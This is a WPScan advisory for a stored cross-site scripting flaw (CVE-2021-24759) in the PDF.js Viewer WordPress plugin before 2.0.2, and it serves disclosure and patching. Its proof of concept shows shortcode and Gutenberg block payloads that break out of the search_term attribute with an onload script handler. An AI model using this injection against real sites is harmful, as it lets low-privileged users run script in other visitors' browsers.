WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

PDF.js Viewer < 2.0.2 - Contributor+ Stored Cross-Site Scripting

Description

The plugin does not escape some of its shortcode and Gutenberg Block attributes, which could allow users with a role as low as Contributor to to perform Cross-Site Scripting attacks

Proof of Concept

[pdfjs-viewer search_term='" onload="alert(/XSS/)']

<!-- wp:pdfjsblock/pdfjs-embed {"searchText":"this is ignored"} -->
<div class="wp-block-pdfjsblock-pdfjs-embed pdfjs-wrapper">[pdfjs-viewer viewer_width=0 viewer_height=800 url=undefined download=true print=true fullscreen=false fullscreen_target=false fullscreen_text="on" zoom=0 search_term='" onload="alert(/XSS/)' ]</div>
<!-- /wp:pdfjsblock/pdfjs-embed -->

Affects Plugins

pdfjs-viewer-shortcode
Fixed in version 2.0.2

References

CVE
CVE-2021-24759

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID
38274ef2-5100-4669-9544-a42346b6727d

Timeline

Publicly Published

2021-11-08 (about 1 years ago)

Added

2021-11-08 (about 1 years ago)

Last Updated

2022-04-11 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin